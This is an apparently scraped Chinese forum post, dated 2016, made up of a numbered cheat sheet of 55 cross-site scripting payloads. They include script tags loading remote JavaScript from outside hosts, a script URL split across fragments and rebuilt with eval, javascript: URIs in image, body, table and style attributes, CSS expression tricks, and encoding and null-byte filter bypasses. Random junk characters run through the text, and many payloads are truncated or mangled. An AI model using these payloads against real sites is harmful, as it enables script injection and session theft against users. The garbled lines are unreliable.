(1)普通的XSS JavaScript注入
7 Y! T# y6 @0 p! A4 z<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
. S9 `. w- M" e/ o; E* u(99)另类弹框
3 f* O: ?, M7 b<q/oncut=alert()>1
5 A. |% b- ^% g<s/onclick=alert()>b
0 k1 |9 L9 F, u <XSS=" onclick="alert(1)//">clickme</SSX=">9 C; F" Q8 f+ m) @# t; p/ ?( \, _4 q
<zzz onclick=alert`1`>clickme</zzz>
0 ?( G+ G- { b9 c" v7 F/ c m <a onclick=alert`1`>clickme</a>$ w! z# Z3 m/ F4 G
<a=">clickme</a=">3 \/ H: t, J3 ]- E7 |
<a=">clickme</a>
9 q3 @" P" b; B: a7 }# x' P<z=">clickme</z=">
7 M* c, F9 N/ ?" \<z onclick=alert`1`>clickme</z>
* t! W7 J; S6 E6 A, Q7 N, }9 W* { Z7 n% E) C
(2)IMG标签XSS使用JavaScript命令
8 n2 l; L# G2 g( W h<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>9 j5 U9 o# X3 y! A7 D7 m* B0 a
! U5 q+ g6 \) y(3)IMG标签无分号无引号
: `) Z* L, M4 H<IMG SRC=javascript:alert(‘XSS’)>) s5 M0 P9 E- H3 o! t8 i
1 x% f; s$ P' ^5 B, q! ?
(4)IMG标签大小写不敏感4 p3 X* L, X; T9 e3 b$ n
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>2 @& ~- E8 V! T' V x" [& D1 N
/ J+ G5 _+ f( Q7 B, u(5)HTML编码(必须有分号)
" K0 n+ Y. i4 g( l" n# `<IMG SRC=javascript:alert(“XSS”)> w' N$ a5 k; t8 [) A7 a5 h
% E8 W- b/ d6 Z, W: S(6)修正缺陷IMG标签; j% R: q0 w C& O& |8 i
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>7 g3 q/ X$ r% j' d+ S& ?( a5 O, \
: b+ F- O B) E
(7)formCharCode标签(计算器)/ C6 o( b. ?& H
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
* R b' o6 L8 U( ^5 h3 F* y4 H- @' H$ ` C; G. h
(8)UTF-8的Unicode编码(计算器)% I! d* p4 F- x4 ]0 d: Z9 h
<IMG SRC=jav..省略..S')>. {* Z7 |9 G1 W9 H
+ f' r+ i- g8 N3 N(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
- a% b8 d# r9 N$ {<IMG SRC=jav..省略..S')>
- _# u7 g1 g+ S% V# S4 E
/ j. W4 N, s6 x7 N( ~" C3 Z" \4 |(10)十六进制编码也是没有分号(计算器)' C4 }- ?5 `4 z
<IMG SRC=\'#\'" /span>) ]% O- e- { |8 z& B
* W5 g6 |& X8 I" u. ]8 ^' s(11)嵌入式标签,将Javascript分开
& ^$ f# @. V: I' m6 D, f; E/ F+ t( G<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>$ I* s! H/ Q* F( Q
+ I; c/ J0 `5 i(12)嵌入式编码标签,将Javascript分开$ d( V7 [' h7 h( K3 e7 V
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>; W# X1 b! F) [, c. I! l# K
! c: D6 V1 F6 O7 G0 x9 F5 X
(13)嵌入式换行符) ]0 _0 n4 r3 l
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
8 p# R" m: ?$ g2 X9 P, b* n! Z- @
" O4 d. B' T: Y, a9 i! D(14)嵌入式回车- R1 o; A- @$ C: ^( |1 w
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
' z% A' C, ?: ^0 o7 y; a) g5 s
; r3 N; H# l0 d# e! M6 i0 [(15)嵌入式多行注入JavaScript,这是XSS极端的例子7 N2 a, g& l) o, U4 z; h
<IMG SRC=\'#\'" /span>
+ r, P: Y @! K4 b/ [. r* `6 I
; [ B. a* H {4 @# ~# K# ~1 [- q(16)解决限制字符(要求同页面)& i, ^# r3 C: F, L) `2 a x
<script>z=’document.’</script>
6 w- g7 m3 G x0 N/ b5 K<script>z=z+’write(“‘</script>3 v/ N5 T% P" ?7 r& W9 \: u2 o# }
<script>z=z+’<script’</script>
1 t7 L& r1 S& Q<script>z=z+’ src=ht’</script>
3 }" p* W. s# _" H3 E<script>z=z+’tp://ww’</script>4 x% X' A( \9 w8 P
<script>z=z+’w.shell’</script>
5 u7 T1 v2 C. w% Q. U# `0 m+ Z5 p<script>z=z+’.net/1.’</script>2 y% o6 r0 I( U1 P# @
<script>z=z+’js></sc’</script>
6 E- v( y/ b" @7 D, K<script>z=z+’ript>”)’</script>6 L/ A2 c" u/ y# V3 g3 j! \
<script>eval_r(z)</script>* Z6 P. t/ p1 t5 }; Z
" K2 m& D& q" ^2 ?1 d
(17)空字符
8 a7 p5 w \4 i% n7 C6 T$ Tperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
5 T6 Q, O1 z5 h9 F7 t6 v. \7 o2 T! N
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
8 u* ]/ a z6 J, |4 Bperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out6 f$ S2 N, V' C4 D+ s
: C, N% g" I3 w9 H1 h: x
(19)Spaces和meta前的IMG标签
. S; O! X$ u$ r* S<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”># i! I. _. }- E# g0 T3 @
# x& p( `. _2 Y
(20)Non-alpha-non-digit XSS& \! X/ R% f Q1 C/ e e
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
U9 R, g' Y# k9 ~* O/ K) H6 W) R- q) _$ `$ N% L. @ ?9 o6 V
(21)Non-alpha-non-digit XSS to 22 f$ H" p8 }& r+ ~. y9 u
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
6 F2 S0 h+ e1 E: M# R
5 L) k% y! ?% Q! ?: T(22)Non-alpha-non-digit XSS to 3: Y: p. d2 I7 c
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>( P: d3 h( l) f) `: e8 E& Z
. j# l7 n5 ]9 a$ J8 w. S(23)双开括号5 e; y, |5 v/ z( Q
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
% z7 k+ d' f4 u9 ~- @& Q! A# p+ B. d3 Y! P9 Q7 r
(24)无结束脚本标记(仅火狐等浏览器)
6 l- x6 m2 y8 M<SCRIPT SRC=http://3w.org/XSS/xss.js?<B># E! w R/ A4 m4 d+ ?
& E( b) }9 ~4 D+ E6 T
(25)无结束脚本标记23 r0 _3 h6 u3 V% q% k9 g! s" H) C
<SCRIPT SRC=//3w.org/XSS/xss.js>' _& `5 f$ u1 E4 P: X5 p
2 Q( D3 E( v: K8 G; i* A
(26)半开的HTML/JavaScript XSS# O/ }$ X. m' n6 t" F3 \
<IMG SRC=\'#\'" /span>
% ]" N2 M" }3 ~& y: H/ I- g; Z A# ~3 D8 R$ S( `- S6 ^0 p
(27)双开角括号0 l' H2 I! r" }
<iframe src=http://3w.org/XSS.html <9 I( \" Y/ g9 O+ X# J* m
$ y8 f- j! \2 k" T( @(28)无单引号 双引号 分号" u \! ~, i! _
<SCRIPT>a=/XSS/" D' }, M# F- l0 l! H' Z
alert(a.source)</SCRIPT>
7 E, T! u/ B' M' Y
@; q. b) z/ z, y(29)换码过滤的JavaScript
* O" {1 K/ e3 [* h- L\”;alert(‘XSS’);//7 l' M/ ^) R. L" r% t' k
" f2 F4 e: E, V) c+ T(30)结束Title标签) l/ y) T g/ v0 t9 o
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>9 T4 B& `5 k7 I3 h8 D4 p
: X6 ^3 e4 c- x
(31)Input Image
; i0 Q# P) k( ]2 L. d* S7 k7 w<INPUT SRC=\'#\'" /span>' u- R' n; h9 t5 d I! J6 S8 Y
! ]4 D& q9 c/ z
(32)BODY Image1 X: N. m( @2 Q& Q4 z+ C+ ?
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>* ~9 h$ N- M. Z# V7 H0 W- K
; `5 Z+ n1 F& X/ P! u1 X: |, T
(33)BODY标签 d0 c( J p. Q0 V! f" w
<BODY(‘XSS’)>& H" r& U9 g- Y7 r0 j2 D' P& V& u8 ?
# q2 m4 P6 ^" N, H7 _! ~2 t(34)IMG Dynsrc
* x5 K" K. G8 H3 w0 F" B5 P<IMG DYNSRC=\'#\'" /span>
* [( K4 Q$ ~0 X: v3 p, d' C4 `) F
(35)IMG Lowsrc
( \$ N0 b8 d4 p0 m6 e4 p<IMG LOWSRC=\'#\'" /span>
: l, r$ c J5 ^" j( ]. N4 I; s* Q$ Y" q: D0 M% T/ J/ c2 ^ O5 T
(36)BGSOUND1 |/ L/ `1 `+ e! q* l$ d( l# B
<BGSOUND SRC=\'#\'" /span>9 ]. f( C, o$ Y1 B$ M' |- H! e: X
9 T' L( S; i& _7 W(37)STYLE sheet# M- [4 ]* Y3 |3 M( _8 S
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>) b7 b; n) c3 U
3 ^8 r! Q0 I1 J8 o(38)远程样式表
' |+ \1 _( X0 |<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>/ p$ [# }$ T ~) f. H% `* y
q2 V( e7 r6 F: p% T( c1 z: @2 d(39)List-style-image(列表式)1 v8 H% G' d" h) j x
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
) `: c d: t" a. ~, }6 F
0 ~+ m# e0 f9 M& ~(40)IMG VBscript
. p' m6 b l. t0 {2 \% U<IMG SRC=\'#\'" /STYLE><UL><LI>XSS0 I7 {: }# r0 |! b& Y
* c8 X& K. W% R6 ?: O" S
(41)META链接url
/ ` _4 G6 O# J0 y5 c<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”># j# I, }. H6 a
3 r% E+ T1 L2 {% v8 q9 g
(42)Iframe! ]( K0 E. A) r2 h, \& Q3 B+ ^ y
<IFRAME SRC=\'#\'" /IFRAME>
3 D3 S4 q, v) H3 A+ ]
8 w4 r# n4 C% ^$ {(43)Frame3 h- d5 A5 ?& S% I" @; s% O* y
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>: ~5 |# U: l& ?( {
3 Z7 _7 L# @/ {. U, j7 e
(44)Table, L+ P8 h( `: h& p
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
5 a( A( X0 Z7 _1 j: h4 F7 N1 Y4 h
2 {' Y9 }4 q7 Y0 I(45)TD) T; w l6 Z% i' u5 y
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
+ ~( h! t) `) Q; \! [5 p' Y4 P+ C+ [5 Y4 u4 N$ q- _
(46)DIV background-image
" N7 g( R9 P. z" Y<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
' H& C5 J& `) e) \! [& D$ Q8 q$ w& b" a2 e) f9 {" Q) N1 H. E
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
, N X, e' M8 h, ?<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>; { e: u9 f" o
5 J4 \7 i$ M' m# M0 R' V" a(48)DIV expression( p! f9 l; v* T1 T. P. S0 Q
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
4 P! X ~0 `( U% y* o9 ^3 q3 v
- K z7 L$ L& ], T" B(49)STYLE属性分拆表达+ }9 y6 _9 {9 t8 P! V& i. C; |
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
- L8 V& ]8 z5 a. |3 G; o
9 q/ j+ f7 K8 R(50)匿名STYLE(组成:开角号和一个字母开头)& o+ R% \& x3 J, m
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
, v: ?7 b1 L3 Z0 x5 C
& ~/ ^/ O6 `: ](51)STYLE background-image8 o- ]9 g) b8 D" W, l( m5 W
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
8 f7 {! k8 g$ P( K- [( Q
1 O! D- e3 k4 k! e# F6 N2 \7 _(52)IMG STYLE方式% `9 D; i0 m& y1 R, S' G( M
exppression(alert(“XSS”))’>9 A$ S4 c2 P- a+ h
4 B. `, g. y! J* r
(53)STYLE background! J' u8 {: T9 J' C, ?" x. I
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>" f. n" W5 o( k: u8 d
& ~( z% @) P l- A* \( P
(54)BASE0 c0 z' n9 R# \2 u% H$ S# s
<BASE HREF=”javascript:alert(‘XSS’);//”>3 Y9 N; o' g( n q
0 Q! h2 Z$ \5 F
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
1 Q& h+ q9 v$ w `" S7 ]4 H<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>) k2 \* u$ ]& e% U0 @$ h& ?
|
发表于 2016-4-28 10:06:15
收藏
支持
反对